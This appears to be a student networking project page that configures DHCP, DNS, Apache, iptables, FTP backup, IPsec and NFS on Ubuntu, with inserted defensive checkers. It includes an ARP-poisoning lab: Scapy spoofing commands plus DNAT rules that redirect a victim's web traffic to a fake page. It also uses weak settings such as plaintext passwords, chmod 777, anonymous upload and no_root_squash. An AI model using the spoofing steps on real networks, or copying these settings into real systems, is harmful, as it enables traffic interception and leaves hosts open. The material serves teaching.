Data Networking/Fall 2016/FYY
1. Fulin Shen 2. Yanxiao Lu 3. Yehui Rong
Motivation
The development of Linux is one of the most prominent examples of free and open-source software collaboration, and this is our motivation to use the Linux operating system to design a robust, effective and dynamic network solution for a start-up company, including the main and backup DNS servers, DHCP server, web server, firewall, IPsec VPN, NFS and backup.
Behaviour of Protocols
Domain Name System
The Domain Name System (DNS) manages the domain names of the web server and translates them to Internet Protocol (IP) addresses. DNS is one of the standard protocols that define how devices exchange data on the Internet. In this project, we design five records for the web server, of types A, AAAA, NS, CNAME, and PTR.
Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (i.e. a scope) configured for a given network. DHCP assigns an IP address when a system is started.
Web server
LAMP (Linux, Apache, MySQL, and PHP) is the most popular solution to get a web server up and running. In this project, we use LAMP to set up a simple web page so that clients can browse it with the help of the DNS and DHCP servers.
Firewall
The main function of a firewall is to provide security through a set of rules applied to the server. Here we use the firewall to allow all the needed services and deny everything else, to make our network secure and robust.
File Transfer Protocol
The File Transfer Protocol (FTP) provides the backup for the server, so that the whole network does not crash if the main server malfunctions. FTP runs on both the client and the server and uses separate control and data connections between them. In the project, we design a policy that backs up all web and SQL data every day and cleans the data every 30 days to save space.
ARP Poison
ARP (Address Resolution Protocol) determines the MAC address of a device from its IP address. ARP poisoning is a network attack that exploits the transition from layer 3 to layer 2 addresses: the hacker replaces the MAC address in a normal ARP message with a counterfeit one and can then take the role of a man in the middle to spoof any traffic. In the project, we use one client as the hacker to attack another client. Every time the normal client tries to log in to the web server page, the hacker replaces the web page and displays a fake website to the client.
IPsec VPN
IPsec (Internet Protocol Security) is a protocol used to offer secure IP communications by authenticating and encrypting the messages between the peers. Here we design an IPsec VPN tunnel between two servers using a pre-shared key.
Network File System
Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems, allowing the user or system administrator to mount (designate as accessible) all or a portion of a file system on a server. In this project, we create 2 clients to whom the shared file is available.
Installation Steps
DHCP server
Step 1: Install DHCP
Command:
sudo apt-get update
sudo apt-get install isc-dhcp-server
Step 2: Configure the network card
Command:
sudo nano /etc/default/isc-dhcp-server
Find the INTERFACES line below the comment lines (the lines starting with ‘#’) and set the network card to ens33:
# on what interfaces should the DHCP server (dhcpd) serve DHCP requests?
# Separate multiple interfaces with spaces, e.g. "eth0 eth1".
INTERFACES="ens33"
Save and Exit
Step 3: Edit the dhcpd.conf file
Command:
sudo nano /etc/dhcp/dhcpd.conf
Set the domain name and the domain-name servers:
# option definitions common to all supported networks...
option domain-name "pawupa.com";
option domain-name-servers ns.pawupa.com;
Uncomment the following line:
authoritative;
Define the IP address pool and the subnet:
# A slightly different configuration for an internal subnet.
subnet 193.168.1.0 netmask 255.255.255.0 {
    range 193.168.1.20 193.168.1.100;
    option domain-name "pawupa.com";
    # master and slave DNS servers, listed in a single statement
    option domain-name-servers 193.168.1.102, 193.168.1.103;
    option routers 193.168.1.1;
    option broadcast-address 193.168.1.255;
    default-lease-time 600;
    max-lease-time 7200;
}
Give fixed addresses to the web server, DNS server, DNS standby server and three clients:
host web {
    hardware ethernet 00:0c:29:65:f0:5e;
    fixed-address 193.168.1.1;
}
host dns {
    hardware ethernet 00:0c:29:43:e7:1a;
    fixed-address 193.168.1.102;
    option routers 193.168.1.1;
    option broadcast-address 193.168.1.255;
    default-lease-time 600;
    max-lease-time 7200;
}
host dnsstandby {
    hardware ethernet 00:0c:29:c5:44:bd;
    fixed-address 193.168.1.103;
    option routers 193.168.1.1;
    option broadcast-address 193.168.1.255;
    default-lease-time 600;
    max-lease-time 7200;
}
I give the three clients 193.168.1.104, 193.168.1.105 and 193.168.1.106 using the same method as above.
Step 4: Give a static address to the DHCP server
Command:
sudo nano /etc/network/interfaces
Configuration of interfaces:
# interfaces(5) file used by ifup (8) and ifdown (8)
auto lo
iface lo inet loopback
auto ens33
iface ens33 inet static
    address 193.168.1.200
    netmask 255.255.255.0
    network 193.168.1.0
    broadcast 193.168.1.255
    gateway 193.168.1.1
iface ens33 inet6 static
    address 1199::1
    netmask 64
DHCP IPv6 configuration
Step 5: Open the IPv6 configuration
Command:
sudo nano /etc/sysctl.conf
Make the changes as shown below:
net.ipv6.conf.all.forwarding=1
Run sudo sysctl -p to make the change take effect.
Step 6: install radvd
Command:
sudo apt-get install radvd
Step 7: Configure the IPv6 address pool
Command:
sudo nano /etc/radvd.conf
interface ens33
{
    AdvSendAdvert on;
    prefix 1199::/64
    {
    };
};
Step 8: give the DHCP server a fixed address
Just as shown in step 4
Step 9: Configure the DHCP server to reach the website through its domain name
Command:
sudo nano /etc/resolv.conf
nameserver 193.168.1.102
nameserver 193.168.1.103
Step 10: Restart and check the DHCP server after configuration
Command:
sudo service networking restart
sudo /etc/init.d/isc-dhcp-server restart
sudo service isc-dhcp-server status
DNS
Master DNS
Step 1: Install bind9
Command:
sudo apt-get install bind9
After installing bind9, we will get the configuration files named.conf, named.conf.options, and named.conf.local in
Step 2: Requirements
We want this host to act as the master DNS and to resolve
www.pawupa.com 193.168.1.1 (webserver)
and to add five records.
Thus, we need to add:
Forward lookup zone “pawupa.com”
Reverse lookup zone “1.168.193.in-addr.arpa”
Another reverse lookup zone for IPv6 “0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa”
Step 3: Edit configuration file “named.conf.local”
Add the forward and backward lookup zones
Command:
sudo vi /etc/bind/named.conf.local
zone "pawupa.com"{
type master;
file "/etc/bind/pawupa.com";
};
zone "1.168.193.in-addr.arpa"{
type master;
file "/etc/bind/rev.pawupa.com";
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{
type master;
file "/etc/bind/revip6.pawupa.com";
};
Step 4: Add files of zones
Copy a zone “db.local” to pawupa.com
Copy a zone “db.local” to rev.pawupa.com
Copy a zone “db.local” to revip6.pawupa.com
Command:
sudo cp /etc/bind/db.local /etc/bind/pawupa.com
sudo cp /etc/bind/db.local /etc/bind/rev.pawupa.com
sudo cp /etc/bind/db.local /etc/bind/revip6.pawupa.com
Step 5: Edit files of zones
Command:
sudo vi /etc/bind/pawupa.com
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.pawupa.com.
@ IN A 193.168.1.102
@ IN AAAA 1199::1111
ns IN A 193.168.1.102
ns IN AAAA 1199::1111
www IN A 193.168.1.1
www IN AAAA 1199::2222
oh IN CNAME www
diao IN CNAME www
wu IN CNAME www
pan IN CNAME www
sudo vi /etc/bind/rev.pawupa.com
;
; BIND reverse data file for local loopback interface
;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.pawupa.com.
102 IN PTR ns.pawupa.com.
1 IN PTR www.pawupa.com.
1 IN PTR diao.pawupa.com.
1 IN PTR oh.pawupa.com.
1 IN PTR wu.pawupa.com.
1 IN PTR pan.pawupa.com.
sudo vi /etc/bind/revip6.pawupa.com
;
; BIND reverse data file for local loopback interface
;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.pawupa.com.
1.1.1.1.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR ns.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR www.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR diao.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR oh.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR wu.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR pan.pawupa.com.
Step 6: Restart DNS service
Command:
sudo /etc/init.d/bind9 restart
Slave DNS
Step 1: Edit the configuration file “named.conf.local” on the master DNS
Add “allow-transfer { 193.168.1.103; };” to each zone so that the zone configuration can be synchronized from the master to the slave. If the master DNS is unavailable, the slave DNS resolves names in its place.
(193.168.1.103 is the IP address of the slave DNS)
Command:
sudo vi /etc/bind/named.conf.local
zone "pawupa.com"{
type master;
file "/etc/bind/pawupa.com";
allow-transfer { 193.168.1.103; };
};
zone "1.168.193.in-addr.arpa"{
type master;
file "/etc/bind/rev.pawupa.com";
allow-transfer { 193.168.1.103; };
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{
type master;
file "/etc/bind/revip6.pawupa.com";
allow-transfer { 1199::5555; };
};
Step 2: Install bind9 to another host (slave DNS)
Command:
sudo apt-get install bind9
Step 3: Edit configuration file “named.conf.local” in slave DNS host
Add the forward and backward lookup zones
Command:
sudo vi /etc/bind/named.conf.local
zone "pawupa.com"{
type slave;
file "/etc/bind/slaves/pawupa.com";
masters { 193.168.1.102; };
};
zone "1.168.193.in-addr.arpa"{
type slave;
file "/etc/bind/slaves/rev.pawupa.com";
masters { 193.168.1.102; };
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{
type slave;
file "/etc/bind/slaves/revip6.pawupa.com";
masters { 1199::1111; };
};
Step 4: Change the permissions of "/etc/bind"
Command:
sudo vi /etc/apparmor.d/usr.sbin.named
Change "/etc/bind/** r," to "/etc/bind/** rw,"
Step 5: Restart apparmor
Command:
sudo /etc/init.d/apparmor restart
Step 6: Restart DNS service
The zone files will be synchronized from the master DNS.
Command:
sudo /etc/init.d/bind9 restart
Web Server
Step 1: Install Apache
Command:
sudo apt-get update
sudo apt-get install apache2
Step 2: Install PHP
Command:
sudo apt-get install php
Step 3: Install MySQL, password “linux”
Command:
sudo apt-get install mysql-server
Step 4: Check mysql is working
Command:
sudo netstat -tap | grep mysql
Step 5: Install phpmyadmin using apache2 and mysql-server with the password “linux”
Command:
sudo apt-get install phpmyadmin
Step 6: Change the permissions of /var/www
Command:
sudo chmod 777 /var/www
Step 7: Create the phpmyadmin link
Command:
sudo ln -s /usr/share/phpmyadmin /var/www/html
Step 8: Create a basic webpage “Index.htm”
Step 9: Change the default web page directory “/var/www” to “/home/fulin”
Command:
sudo vi /etc/apache2/apache2.conf
Step 10: Change the default web page directory “/var/www/html” to “/home/fulin”
Command:
sudo vi /etc/apache2/sites-available/000-default.conf
Step 11: Restart the apache
Command:
sudo /etc/init.d/apache2 restart
Step 12: Use the browser on the Mac to open the web page of the web server in the VM
Firewall
Step 1: List the current rules that are configured for iptables
Command:
sudo iptables -L
Step 2: Accept your current SSH connection
Command:
sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
Step 3: Accept SSH, HTTP, FTP, TFTP, DHCP, DNS, VPN
Command:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT
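# DNS queries use UDP as well as TCP
sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT
# DHCPv6 (ports 546 and 547) runs over UDP
sudo iptables -A INPUT -p udp --dport 546 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 547 -j ACCEPT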
sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT
sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
Step 4: Allow services on the computer to communicate with each other by sending network packets over the loopback interface
Command:
sudo iptables -I INPUT 1 -i lo -j ACCEPT
Step 5: Accept all traffic on loopback interface
Command:
sudo iptables -A INPUT -i lo -j ACCEPT
sudo iptables -A OUTPUT -o lo -j ACCEPT
Step 6: Allow Established Outgoing Connections
Command:
sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT
Step 7: Internal to External
Command:
sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT
Step 8: Drop Invalid Packets
Command:
sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
Step 9: Deny ping
Command:
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT
Step 10: Limit every client to 10 connections
Command:
sudo iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 10 -j REJECT
Step 11: Prevent HTTP flood
Command:
sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT
Step 12: Block an IP Address
Command:
sudo iptables -I INPUT -s 193.168.1.104 -j DROP
Step 13: Cancel the block IP address
Command:
sudo iptables -D INPUT -s 193.168.1.104 -j DROP
Step 14: Permit VPN
Command:
sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
sudo iptables -A INPUT -p esp -j ACCEPT
Step 15: Deny any other
Command:
sudo iptables -A INPUT -j DROP
Step 16: In order to preserve your iptables rules upon reboot, install iptables-persistent
Command:
sudo apt-get install iptables-persistent
Step 17: If you make any changes to the rules, run the following commands so you don’t lose them during a system reboot
Command:
sudo netfilter-persistent save
sudo netfilter-persistent reload
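iptables walks a chain from top to bottom and stops at the first terminating rule, so the order in which the steps above append rules decides which of them ever see a packet. The following added example (not part of the original page) replays a constructed subset of those commands and reports every rule that an earlier, broader rule already covers. The function names are hypothetical, and the parser assumes each option takes exactly one argument and that no `!` negation is used, as in the commands above.

```python
import shlex

TERMINATING = {"ACCEPT", "DROP", "REJECT"}
# Plain header matches. Anything else (-m <module> and its options) makes a
# rule conditional, so such a rule is never assumed to cover another rule.
FIELDS = {"-p": "proto", "--dport": "dport", "--sport": "sport", "-s": "src",
          "-d": "dst", "-i": "in", "-o": "out", "--icmp-type": "icmp"}

def parse(cmd):
    """Split one 'iptables -A|-I CHAIN ...' command into (op, position, rule)."""
    tok = shlex.split(cmd)
    tok = tok[tok.index("iptables") + 1:]        # tolerate a leading "sudo"
    op, chain, rest = tok[0], tok[1], tok[2:]
    pos = 1                                      # -I without a number inserts at the top
    if op == "-I" and rest and rest[0].isdigit():
        pos, rest = int(rest[0]), rest[1:]
    rule = {"text": cmd, "chain": chain, "target": None, "match": {}, "extra": []}
    for opt, val in zip(rest[0::2], rest[1::2]):
        if opt == "-j":
            rule["target"] = val
        elif opt in FIELDS:
            rule["match"][FIELDS[opt]] = val
        else:
            rule["extra"].append((opt, val))
    return op, pos, rule

def build(commands):
    """Replay the commands and return the resulting rule order per chain."""
    chains = {}
    for cmd in commands:
        op, pos, rule = parse(cmd)
        rules = chains.setdefault(rule["chain"], [])
        if op == "-A":
            rules.append(rule)
        elif op == "-I":
            rules.insert(pos - 1, rule)
    return chains

def covers(a, b):
    """True if unconditional terminating rule a matches every packet b matches."""
    return (a["target"] in TERMINATING and not a["extra"]
            and all(b["match"].get(k) == v for k, v in a["match"].items()))

def shadowed(commands):
    """Return (unreachable rule, rule that covers it) pairs."""
    found = []
    for rules in build(commands).values():
        for j, b in enumerate(rules):
            for a in rules[:j]:
                if covers(a, b):
                    found.append((b["text"], a["text"]))
                    break
    return found

# Constructed subset of the commands from Steps 2 to 15, in the page's order
RULES = [
    "iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT",
    "iptables -A INPUT -p tcp --dport 22 -j ACCEPT",
    "iptables -A INPUT -p tcp --dport 80 -j ACCEPT",
    "iptables -A INPUT -p udp --dport 500 -j ACCEPT",
    "iptables -I INPUT 1 -i lo -j ACCEPT",
    "iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT",
    "iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 10 -j REJECT",
    "iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT",
    "iptables -I INPUT -s 193.168.1.104 -j DROP",
    "iptables -A INPUT -p udp --dport 500 -j ACCEPT",
    "iptables -A INPUT -j DROP",
]

if __name__ == "__main__":
    for rule, earlier in shadowed(RULES):
        print("never reached:", rule, "\n   covered by:", earlier)
```

Rules that limit a service only take effect when they sit above the plain ACCEPT rule for the same port.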
Backup
Step 1: Install ftp
Command:
sudo apt-get install vsftpd
Step 2: Start ftp server
Command:
sudo service vsftpd start
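Step 3: Create the ftp script “testftp.sh”
#!/bin/sh
# Daily backup: archive $DB_DR locally, prune old archives, upload by FTP.
FTP_IP=193.168.1.104
FTP_USER=fulinshen
FTP_PASS=sflin911911
FTP_backup=/home/fulinshen/test   # remote backup directory
BK_DR=/home/fulin/varcopy         # local backup directory
DB_DR=/var                        # directory to back up
DAYS=30                           # retention in days
LINUX_USER=fulinshen
date=$(date +%Y%m%d)
# Create today's archive and hand it to the backup user
tar zcvf "$BK_DR/test$date.tar.gz" "$DB_DR"
chown -R "$LINUX_USER:$LINUX_USER" "$BK_DR"
# Delete local archives older than $DAYS days (the pattern must not match testftp.sh itself)
find "$BK_DR" -name "test*.tar.gz" -type f -mtime +"$DAYS" -exec rm {} \;
# Date stamp of the archive that is now $DAYS days old on the FTP server
deldate=$(date -d "-$DAYS day" +%Y%m%d)
ftp -i -v -n "$FTP_IP" << END
user $FTP_USER $FTP_PASS
binary
cd $FTP_backup
lcd $BK_DR
mput test$date.tar.gz
mdelete test$deldate.tar.gz
bye
END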
Step 4: Make the script executable
Command:
chmod +x /home/fulin/varcopy/testftp.sh
Step 5: Change configuration of ftp
sudo vi /etc/vsftpd.conf
anonymous_enable=YES
local_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
Step 6: Add kernel module to allow passive ftp
modprobe ip_conntrack_ftp
Step 7: Restart ftp service and check the status
Command:
service vsftpd restart
service vsftpd status
Step 8: Add a cron rule to run the script every day at 14:40
Command:
sudo vi /etc/crontab
40 14 * * * root sh /home/fulin/varcopy/testftp.sh >/dev/null 2>&1
Step 9: Restart cron service and check the status
Command:
service cron restart
service cron status
ARP poison
Step 1: Install scapy
Command:
sudo apt-get install tcpdump python3-crypto ipython3
sudo apt install python-scapy
sudo apt install sysv-rc-conf
Step 2: Use root
Command:
sudo passwd root
Step 3: Start iptables after reboot
Command:
sysv-rc-conf --level 2345 iptables on
Step 4: Turn on IP forwarding
Command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 5: Configure Scapy arp poison
Command:
scapy
op=2
victim= '193.168.1.105'
spoof= '193.168.1.1' # gateway IP
mac='00:0c:29:73:56:67' # victim mac address
arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
send(arp)
op =1
arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
send(arp)
send(arp,inter=2,count=1000) # send arp every 2 seconds, 1000 counts
Step 6: Create fake web page
Command:
/etc/init.d/apache2 start
echo "WOW,YOU WON THE POWER BALL JACKPOT." > /home/fulinshen/index.htm
Step 7: Configure iptables to forward all traffic except HTTP traffic. For HTTP traffic, we return our own site instead (193.168.1.104 is the IP address of the hacker)
Command:
iptables -t nat --flush
iptables --zero
iptables -A FORWARD --in-interface ens33 -j ACCEPT
iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 193.168.1.104
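Seen from the defender's side, the poisoning above appears on the wire as an ARP message that binds the gateway's IP address to a different MAC address than before. The following added example (not from the original page) parses raw Ethernet/ARP frames and flags such conflicts. The frames are constructed sample input, the MAC 00:0c:29:aa:bb:cc for 193.168.1.104 is a made-up value, and the class and function names are hypothetical.

```python
import socket
import struct

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_arp(frame):
    """Parse an Ethernet II frame carrying IPv4-over-Ethernet ARP (RFC 826).
    Returns None for other traffic and for truncated frames."""
    if len(frame) < 42:
        return None
    _dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0806:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": mac(src), "op": op, "sha": mac(sha),
            "spa": socket.inet_ntoa(spa), "tpa": socket.inet_ntoa(tpa)}

class ArpWatch:
    """Keeps the first MAC seen for each IP and reports later contradictions."""

    def __init__(self, pinned=None):
        self.bindings = dict(pinned or {})   # ip -> mac, optionally pre-seeded

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None or arp["spa"] == "0.0.0.0":   # ignore address probes
            return []
        alerts = []
        if arp["eth_src"] != arp["sha"]:
            # Ethernet header and ARP payload disagree about the sender
            alerts.append(("eth-sender-mismatch", arp["spa"], arp["sha"]))
        known = self.bindings.setdefault(arp["spa"], arp["sha"])
        if known != arp["sha"]:
            alerts.append(("binding-conflict", arp["spa"], arp["sha"]))
            owned = sorted(ip for ip, m in self.bindings.items() if m == arp["sha"])
            if owned:   # the claiming MAC is already known under another IP
                alerts.append(("mac-also-owns", ",".join(owned), arp["sha"]))
        return alerts

# Addresses taken from the page, plus one constructed MAC
GATEWAY_IP, GATEWAY_MAC = "193.168.1.1", "00:0c:29:65:f0:5e"
VICTIM_IP, VICTIM_MAC = "193.168.1.105", "00:0c:29:73:56:67"
ATTACKER_IP, ATTACKER_MAC = "193.168.1.104", "00:0c:29:aa:bb:cc"  # MAC is made up

def sample_frame(eth_src, eth_dst, op, sha, spa, tha, tpa):
    """Build one constructed 42-byte ARP frame used as offline sample input."""
    raw = lambda s: bytes.fromhex(s.replace(":", ""))
    return (raw(eth_dst) + raw(eth_src)
            + struct.pack("!HHHBBH", 0x0806, 1, 0x0800, 6, 4, op)
            + raw(sha) + socket.inet_aton(spa) + raw(tha) + socket.inet_aton(tpa))

SAMPLE = [
    # genuine reply from the gateway
    sample_frame(GATEWAY_MAC, VICTIM_MAC, 2, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    # ordinary request that reveals the real binding of 193.168.1.104
    sample_frame(ATTACKER_MAC, "ff:ff:ff:ff:ff:ff", 1, ATTACKER_MAC, ATTACKER_IP,
                 "00:00:00:00:00:00", VICTIM_IP),
    # reply that claims the gateway IP for the MAC of 193.168.1.104
    sample_frame(ATTACKER_MAC, VICTIM_MAC, 2, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
]

if __name__ == "__main__":
    watch = ArpWatch()
    for frame in SAMPLE:
        for alert in watch.observe(frame):
            print(alert)
```

Pre-seeding `ArpWatch` with the gateway's known binding gives the same effect as a static ARP entry for detection purposes: the first conflicting claim is reported instead of being trusted.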
IPsec VPN
Step 1: Install strongSwan
Command:
sudo apt-get install strongswan
Step 2: Install OpenSC
Command:
sudo apt-get install opensc
Step 3: Install GMP library
Command:
sudo apt-get install libgmp10
Step 4: Install development library of GMP
Command:
sudo apt-get install libgmp-dev
Step 5: Install OpenSSL libcrypto
Command:
sudo apt-get install libssl-dev
Step 6: Under /usr/src/ folder, download the Strongswan
Command:
cd /usr/src
wget https://download.strongswan.org/strongswan-5.5.0.tar.gz
Step 7: Extract the compressed file
Command:
tar -xzf strongswan-5.5.0.tar.gz
Step 8: Run the configure script to check the dependencies of strongswan
Command:
cd strongswan-5.5.0
./configure --help | grep pkcs
Step 9: Run the configure script, use prefix /usr/local and enable openssl support
Command:
./configure --prefix=/usr/local --enable-openssl
Step 10: Run the following two commands to compile and install strongswan under /usr/local directory
Command:
make
make install
Step 11: Under /usr/local/etc, configure the pre-shared-key based tunnel
One side ipsec.conf configuration:
config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no
conn %default
conn tunnel #
    left=193.168.1.1
    leftsubnet=192.168.223.0/24
    right=193.168.1.104
    rightsubnet=192.168.222.0/24
    ike=aes256-sha2_256-modp1024!
    esp=aes256-sha2_256!
    keyingtries=0
    ikelifetime=1h
    lifetime=8h
    dpddelay=30
    dpdtimeout=120
    dpdaction=restart
    authby=secret
    auto=start
    keyexchange=ikev2
    type=tunnel
ipsec.secrets file configuration:
193.168.1.1 193.168.1.104 : PSK "linux"
The other side's ipsec.conf configuration:
config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no
conn %default
conn tunnel #
    left=193.168.1.104
    leftsubnet=192.168.1.0/24
    right=193.168.1.1
    rightsubnet=192.168.2.0/24
    ike=aes256-sha2_256-modp1024!
    esp=aes256-sha2_256!
    keyingtries=0
    ikelifetime=1h
    lifetime=8h
    dpddelay=30
    dpdtimeout=120
    dpdaction=restart
    authby=secret
    auto=start
    keyexchange=ikev2
    type=tunnel
ipsec.secrets file configuration:
193.168.1.104 193.168.1.1 : PSK "linux"
Step 12: After the changes on both sides, create the tunnel
Command:
sudo ipsec restart
Step 13: Check the status of the tunnel on both machines
Command:
sudo ipsec statusall
Step 14: Test
One server pings the other:
ping -s 4048 193.168.1.104
On the other side, watch the status (if the number of packets and the number of bytes increase while the ping is running, things are running the way they should be):
sudo watch ipsec statusall
NFS
NFS-Server
Step 1: Install nfs-kernel-server
Command:
sudo apt-get install nfs-kernel-server
sudo apt-get install rpcbind
Step 2: Make share folder
Command:
mkdir /home/reve001/Desktop/nfs
Step 3: Edit configuration
Command:
sudo vi /etc/exports
/home/reve001/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)
Step 4: Restart service
Command:
sudo service rpcbind restart
sudo service nfs-kernel-server restart
Step 5: Test
Command:
showmount -e
Export list for ubuntu:
/home/reve001/Desktop/nfs *
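The export line in Step 3 offers the folder to every host (`*`) read-write and with `no_root_squash`, so root on any client acts as root on the exported files. The following added example (not from the original page) parses /etc/exports text and reports such options. The second sample entry, which limits an export to two client addresses, is constructed, the function names are hypothetical, and paths containing spaces are not handled.

```python
import re

# One client entry: host(opt,opt,...) where either part may be missing
ENTRY = re.compile(r"^([^\s()]*)(?:\(([^)]*)\))?$")

def parse_exports(text):
    """Yield (path, client, options) for every client entry in exports text."""
    text = text.replace("\\\n", " ")              # join continuation lines
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        path, *entries = line.split()
        for entry in entries:
            m = ENTRY.match(entry)
            if not m:
                continue
            # This checker treats an option list with no host name, as in
            # "host (rw)" written with a stray space, as applying to any host.
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            yield path, client, opts

def audit_exports(text):
    """Return (path, client, issue) tuples for risky export settings."""
    findings = []
    for path, client, opts in parse_exports(text):
        world = client == "*"
        if world:
            findings.append((path, client, "exported-to-any-host"))
        if "no_root_squash" in opts:
            # remote uid 0 is not mapped to the anonymous user
            findings.append((path, client, "no_root_squash"))
        if world and "rw" in opts:
            findings.append((path, client, "world-writable"))
    return findings

SAMPLE = """\
# line from Step 3 of the page
/home/reve001/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)
# constructed alternative: two named clients, root squashing left at its default
/srv/nfs 193.168.1.105(rw,sync,no_subtree_check) \\
         193.168.1.106(rw,sync,no_subtree_check)
"""

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE):
        print(finding)
```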
NFS-Clients
Step 1: Install nfs-common for clients
Command:
sudo apt-get install nfs-common
sudo apt-get install rpcbind
Step 2: Make share folder
Command:
mkdir /home/fulinshen/Desktop/nfs
Step 3: Mount the shared folder
Command:
sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs
Step 4: Mount the shared folder automatically when the client is turned on
Command:
sudo vi /etc/rc.local
Add the line:
sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs
Test Plan
DHCP Test
Step 1: Start the DHCP server.
Step 2: Start all the other clients and use the “ifconfig” command to check whether the IP address is correctly received from the DHCP server.
Webserver Test
Step 1: Start the web server.
Step 2: At the client side, open the browser and enter the IP address of the webserver to check whether the right web page is displayed.
DNS Test
Step 1: Start the DNS server.
Step 2: At the client side, open the browser again and this time enter the domain name of the webserver instead of the IP address, then check whether the right web page is displayed.
Firewall Test
Step 1: At a client side, open the browser to surf the web page.
Step 2: Add an iptables rule to deny the client access to the web server.
Step 3: At the client side, open the browser again, force refresh the web page and check whether the right web page is displayed.
Step 4: Delete the iptables rule to allow the client to browse the web server again.
Step 5: At the client side, open the browser again, force refresh the web page and check whether the right web page is displayed.
Step 6: With all the other iptables rules in place, test all the functions of the project to check whether they are working well.
Backup Test
Step 1: Start the FTP server.
Step 2: Change the FTP configuration so that the backup process runs within the next couple of minutes, then restart the FTP server.
Step 3: When the scheduled time arrives, check whether the files are backed up to the local folder and to the remote device’s folder too.
ARP Poison Test
Step 1: Start the normal web server and the hacker’s web server.
Step 2: The hacker sends fake ARP messages to the client.
Step 3: The client opens the browser to visit the normal web page; check whether the client sees the fake web page instead of the normal page.
IPsec VPN Test
Step 1: One server pings the other (ping -s 4048 193.168.1.104).
